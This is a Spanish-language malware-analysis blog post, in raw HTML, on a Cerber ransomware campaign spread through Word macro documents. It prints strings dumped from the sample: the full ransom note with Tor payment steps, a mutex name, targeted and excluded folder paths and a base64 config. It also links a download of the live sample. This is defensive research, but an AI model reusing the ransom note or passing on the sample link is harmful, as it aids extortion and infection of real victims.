<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgFad7yGlqblxKEy28oyC3DKOYABSyAdw0WM4aiT7iPxE1sLT4bBwdfYr7-RjOio58NvlWR_8pVT_K5g6YyMK5We0Q9J7y8CL1WOtf91A8YnIIcsvYrkjyxDTV3795Iuun-6EYMa60ugs/s1600/dump1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgFad7yGlqblxKEy28oyC3DKOYABSyAdw0WM4aiT7iPxE1sLT4bBwdfYr7-RjOio58NvlWR_8pVT_K5g6YyMK5We0Q9J7y8CL1WOtf91A8YnIIcsvYrkjyxDTV3795Iuun-6EYMa60ugs/s640/dump1.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Strings</b></span><br />
<b><span style="font-family: Courier New, Courier, monospace;"><br /></span></b>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">91.239.24.0/23</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">11.56.22.0/27</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">17.35.12.0/27</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rsa_key_size</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">%s\%s.tmp</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">folders</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Your documents, photos, databases and other important files have been encrypted!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CERBER_CORE_PROTECTION_MUTEX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Attention! Attention! Attention!</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\steam\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\microsoft sql server\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\office\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\onenote\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\outlook\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\office\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\word\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\onenote\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\outlook\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\thunderbird\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\powerpoint\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\the bat!\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bitcoin\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\excel\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft sql server\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\powerpoint\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\microsoft\excel\</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">MachineGuid</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SOFTWARE\Microsoft\Cryptography</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b></b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CERBER RANSOMWARE</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> HAVE BEEN ENCRYPTED! </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> The only way to decrypt your files is to receive </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> the private key and decryption program. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> To receive the private key and decryption program </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> go to any decrypted folder - inside there is the special file (*HELP_HELP_HELP*) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> with complete instructions how to decrypt your files. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> If you cannot find any (*HELP_HELP_HELP*) file at your PC, </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> follow the instructions below: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 1. Download "Tor Browser" from https://www.torproject.org/ and install it. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 2. In the "Tor Browser" open your personal page here: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> http://{TOR}.onion/{PC_ID} </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Note! This page is available via "Tor Browser" only. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Verifique esta muestra con <a href="http://www.mcafee.com/us/downloads/free-tools/interceptor.aspx">McAfee Interceptor</a> y bloqueo a esta amenaza.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiEVKzUUhTUc6Dz39zgl1aGKivU20VF29Zgn0eiSCs2mwzChpq7L083nBgrBP_n9bEAsTIVf-XK9t3758o6dmC0MrAYvjsh9-T3wnrTNxZQ86ulLBN2kqutfqIgl2Dpc0jNfWiNfbImEI/s1600/MCAfee2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiEVKzUUhTUc6Dz39zgl1aGKivU20VF29Zgn0eiSCs2mwzChpq7L083nBgrBP_n9bEAsTIVf-XK9t3758o6dmC0MrAYvjsh9-T3wnrTNxZQ86ulLBN2kqutfqIgl2Dpc0jNfWiNfbImEI/s1600/MCAfee2.jpg" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Sample : https://dl.dropboxusercontent.com/u/80008916/cerber_23_01_17.rar</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Es todo por el momento @Dkavalanche 2017</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-9812517694652827482016-12-29T09:18:00.000-08:002016-12-29T12:12:55.711-08:00<b><span style="font-family: "arial" , "helvetica" , sans-serif;">CERBER #Ransomware: Nueva campaña con documentos word con Macros.</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Bueno, tenia pensado ya cerrar la persiana del blog por este año, pero no.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Vamos a comentar esta campaña de Ransomware que pide un rescate por los archivos encriptados de las víctimas.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Fuente del correo recibido, no tiene subject.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKjssVeVzgoAWjws5G0_Tp7yqQ7QHzgX3Iq4W-HMCGrt-upZb0JkZn717fgsHXSn-HHP_-c6WCVqjhKVTWaedBsaHCOVci0pry7W8xM-MInwDficHx14q9ABeNCHzDIifsJJdeOjRQYj8/s1600/mail.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKjssVeVzgoAWjws5G0_Tp7yqQ7QHzgX3Iq4W-HMCGrt-upZb0JkZn717fgsHXSn-HHP_-c6WCVqjhKVTWaedBsaHCOVci0pry7W8xM-MInwDficHx14q9ABeNCHzDIifsJJdeOjRQYj8/s640/mail.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Contiene un .zip con parte del nombre igual al correo de la victima.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQz6iQHXj8fenD2pn-fm_BD7r_8crOGuzlFVkIRkYvsJ9uj5IQ0wkdLnDIi-fB8tMCxXT2_IU69uddqcGKAFHxNfLv4pwbOLLEqnHuUGjp1vM2xzzqr6X7ZTdTs80pybvbeTBag9l0Niw/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQz6iQHXj8fenD2pn-fm_BD7r_8crOGuzlFVkIRkYvsJ9uj5IQ0wkdLnDIi-fB8tMCxXT2_IU69uddqcGKAFHxNfLv4pwbOLLEqnHuUGjp1vM2xzzqr6X7ZTdTs80pybvbeTBag9l0Niw/s640/01.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Al abrir el documento una imagen nos indica activar el contenido (Macros).</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtG33ebS8VF1rWHIOxWYuer9_mQupc0MM73SS38nlqLHx6Ll4vMWlHYTmjyQIl3Igy97r6dlKRFXuFGGwFZrq3lfnT5qy5yFn8H36lWyDiqp1gwiB9ZVb2Fvei88vTDOPW3FXA2hgM4A/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFtG33ebS8VF1rWHIOxWYuer9_mQupc0MM73SS38nlqLHx6Ll4vMWlHYTmjyQIl3Igy97r6dlKRFXuFGGwFZrq3lfnT5qy5yFn8H36lWyDiqp1gwiB9ZVb2Fvei88vTDOPW3FXA2hgM4A/s640/02.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Aquí los macros que contiene el .DOC</span><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNrS0CBIr4_W1eALR7pIF2LBMKrn8G6pUt-tv0DE2w6y193dQsIIKLYlZ6l6Gfi4uZ7dRLlW6lCSpBBV-s6LxnRpyKyLswGbxpJAPadlJwZuNBIr9nDe5N0TtZWY3aKXaMCkpUeXektU8/s1600/macros.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNrS0CBIr4_W1eALR7pIF2LBMKrn8G6pUt-tv0DE2w6y193dQsIIKLYlZ6l6Gfi4uZ7dRLlW6lCSpBBV-s6LxnRpyKyLswGbxpJAPadlJwZuNBIr9nDe5N0TtZWY3aKXaMCkpUeXektU8/s640/macros.jpg" width="640" /></a></div>
<b><br /></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Probamos la ejecución en una VM vemos que hace la descarga del siguiente elemento.</span><br />
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Pw6zDxEWGFBZ8e0JImKx4WruEO0w1nbH8DNLDeB02l4Wjxt_QNo5FhkXh4k24YUlxry1Y0ScyRYTc7nqTSxNa_KymLOV76mC4t-3Kg04IDlJSWJXLhE3KfcnVV1HPfQVSOG-aI40hHQ/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Pw6zDxEWGFBZ8e0JImKx4WruEO0w1nbH8DNLDeB02l4Wjxt_QNo5FhkXh4k24YUlxry1Y0ScyRYTc7nqTSxNa_KymLOV76mC4t-3Kg04IDlJSWJXLhE3KfcnVV1HPfQVSOG-aI40hHQ/s640/download.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Descarga del Ejecutable con el querido malzilla.</span></div>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0MXib1a3H46CzoSUHm6IF02J8tsUDd4MNjnZQKIZq1npFQdqynRClzq4S2nUvxtJJtkzn_9uU20NgXuB0-q3QoqveW_wAsynr3OohAdwxKxgATVhDELbUrwTbLn9iyfd4ShJ3mwsNDOQ/s1600/malzilla.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0MXib1a3H46CzoSUHm6IF02J8tsUDd4MNjnZQKIZq1npFQdqynRClzq4S2nUvxtJJtkzn_9uU20NgXuB0-q3QoqveW_wAsynr3OohAdwxKxgATVhDELbUrwTbLn9iyfd4ShJ3mwsNDOQ/s640/malzilla.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">El ejecutable contiene</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> el icono de un supuesto .pdf</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtwny4PACM-gp10Kv06fxVweNGlzymWGCLeE1A8O9HjS2uGl9JcZGSlBnJprFMY7pYUao6Wv-0bMJ2oJ4ywQclvYWEWstaSZiQes3QALfV-YDbplRIbciVrFHYY_T-OmDkhU0ELjrt3wY/s1600/icono.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtwny4PACM-gp10Kv06fxVweNGlzymWGCLeE1A8O9HjS2uGl9JcZGSlBnJprFMY7pYUao6Wv-0bMJ2oJ4ywQclvYWEWstaSZiQes3QALfV-YDbplRIbciVrFHYY_T-OmDkhU0ELjrt3wY/s1600/icono.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Utiliza un packer de NullSoft (<a href="https://es.wikipedia.org/wiki/Nullsoft_Scriptable_Install_System">PiM</a>P SFX)</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi4TvJEa_e6p47GszslfVb0Yv3yhSSm8GFl0JMMH60wODohORdss2noHCb3nqAxTWIW-mcLPbK95HOhxwpompQdgKtbKG_uajqls6jNsHoLNtAL1QrZGMnAxeZWL5Vvp-TulP2-GKyrPU/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi4TvJEa_e6p47GszslfVb0Yv3yhSSm8GFl0JMMH60wODohORdss2noHCb3nqAxTWIW-mcLPbK95HOhxwpompQdgKtbKG_uajqls6jNsHoLNtAL1QrZGMnAxeZWL5Vvp-TulP2-GKyrPU/s640/06.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Analisis en V.T. con un indice mínimo de detecciones.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj0h7kb86Y3DTQ_V6Jit2optQX1v6hOFSjYg5TqwY5PmH92q-_q4EKdGVcz3nonObt3j3xoQqdJFM-b8Xs12PiQYkO2fyOmfDw-3rEZl1Mw7S_kOa5C_NJBt2_xrwU4x9sPtvgv_LYJCk/s1600/vt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhj0h7kb86Y3DTQ_V6Jit2optQX1v6hOFSjYg5TqwY5PmH92q-_q4EKdGVcz3nonObt3j3xoQqdJFM-b8Xs12PiQYkO2fyOmfDw-3rEZl1Mw7S_kOa5C_NJBt2_xrwU4x9sPtvgv_LYJCk/s640/vt.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Función anti Debugging.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyPHLPERg0xZiuOoEQyQTJq9MPxjYrMQLvSmigxHIHUHkQuCX6pnUVlNhulbBN8ulQC2b3ejfVbwmk8rAYzSMqfjBO8OWi2WTcRE3qoyPK14005zNUyhpinN49nw8rvna0rP3jx1vDOFE/s1600/07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyPHLPERg0xZiuOoEQyQTJq9MPxjYrMQLvSmigxHIHUHkQuCX6pnUVlNhulbBN8ulQC2b3ejfVbwmk8rAYzSMqfjBO8OWi2WTcRE3qoyPK14005zNUyhpinN49nw8rvna0rP3jx1vDOFE/s640/07.jpg" width="404" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQgj3bQSaQ96syrOgUgiC8HT5ytqizRlkgmyR3EoPTLvuxmxR1zVUqP2h5JWyUeoUuGDja9cJdEoqiK0Om534cgZsVPHL21EkMMqG4u58KsjkmEnPf5ft6DCSa7MTEVlBn5um3u_-Bm4/s1600/08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQgj3bQSaQ96syrOgUgiC8HT5ytqizRlkgmyR3EoPTLvuxmxR1zVUqP2h5JWyUeoUuGDja9cJdEoqiK0Om534cgZsVPHL21EkMMqG4u58KsjkmEnPf5ft6DCSa7MTEVlBn5um3u_-Bm4/s640/08.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Dumpeamos en ResumeThread</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzKHuVnNrlTY7U1J2Z_yh3ttp2RPguS0kEHveW8N9385I0jqPNxflkv6VZh7WzEDLXAJwAx4sGnrRVfIMKxU-FkbNoKemrmhbTPtdcyn1oQPGCD3RW0bf-dS0wG8TMAKFNExBPCdlPjw/s1600/dumper.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFzKHuVnNrlTY7U1J2Z_yh3ttp2RPguS0kEHveW8N9385I0jqPNxflkv6VZh7WzEDLXAJwAx4sGnrRVfIMKxU-FkbNoKemrmhbTPtdcyn1oQPGCD3RW0bf-dS0wG8TMAKFNExBPCdlPjw/s640/dumper.jpg" width="640" /></a></div>
<br />
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Strings obtenidos en el Dump</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvHd5DjmH7SaZuG77CeWH0dsUbCcjOhkCma1lMD4EUzfVIj940M4-8SiwnhUWJ7oLyuHZaAK1suKr9i-9a5Ixp0P52otFP_KNEcX_1khD1zPIexfP3rgw2SXiycC1jIjjsm_KFaCsvxPE/s1600/text.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvHd5DjmH7SaZuG77CeWH0dsUbCcjOhkCma1lMD4EUzfVIj940M4-8SiwnhUWJ7oLyuHZaAK1suKr9i-9a5Ixp0P52otFP_KNEcX_1khD1zPIexfP3rgw2SXiycC1jIjjsm_KFaCsvxPE/s640/text.jpg" width="640" /></a></div>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Analisis en VT sin el Crypter.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8dhpL6LSLBVz2ddVfmx8aj5Bhb5Z45YT76_0zYa_ex5q0ifoq1G4CPCwEi31ZNkyqTttLVJ-Ky8C0lcwUQDMvnHvsuE5-0Cj5oXx3PxhVeF4ned-okSv3bNKHzxpa9LLW3h2d_aYPhE/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8dhpL6LSLBVz2ddVfmx8aj5Bhb5Z45YT76_0zYa_ex5q0ifoq1G4CPCwEi31ZNkyqTttLVJ-Ky8C0lcwUQDMvnHvsuE5-0Cj5oXx3PxhVeF4ned-okSv3bNKHzxpa9LLW3h2d_aYPhE/s640/vt2.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Prueba Dinámica.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfzCNW9PdrlpVNdAVlF0kU2-iooUO7gUY8L9n8ZC7ECuZhkahsSs_CA-Le-Zj7vN_iT2XZonBkiQ5mrIPl0PFl2xmqSIPpUXFtkBvPJLoPXE0-uqSE9JH65A5UbsZeUwhMI3CTvnVpkI/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMfzCNW9PdrlpVNdAVlF0kU2-iooUO7gUY8L9n8ZC7ECuZhkahsSs_CA-Le-Zj7vN_iT2XZonBkiQ5mrIPl0PFl2xmqSIPpUXFtkBvPJLoPXE0-uqSE9JH65A5UbsZeUwhMI3CTvnVpkI/s640/04.jpg" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJIFqYltWuox7lhFCcOjZEmW3M6R4-_lUpODP5svhYMaWPfF_E8Nnc1708SSNgLiHL8LaPojW7mowBBzMWZK1HJRmpCWkCniF8Qkv-MFk7fsw1PT9cTj8sY6iafkWwKGYvAGT0AR3NYI/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJIFqYltWuox7lhFCcOjZEmW3M6R4-_lUpODP5svhYMaWPfF_E8Nnc1708SSNgLiHL8LaPojW7mowBBzMWZK1HJRmpCWkCniF8Qkv-MFk7fsw1PT9cTj8sY6iafkWwKGYvAGT0AR3NYI/s640/05.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Parte de la Config del Ransomware</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ntuser.dat</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">thumbs.db</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">folders</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$getcurrent\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$recycle.bin\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$windows.~bt\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\$windows.~ws\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\boot\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\all users\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\default user\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\localservice\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\documents and settings\networkservice\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\intel\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\msocache\</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">:\perflogs\</span></div>
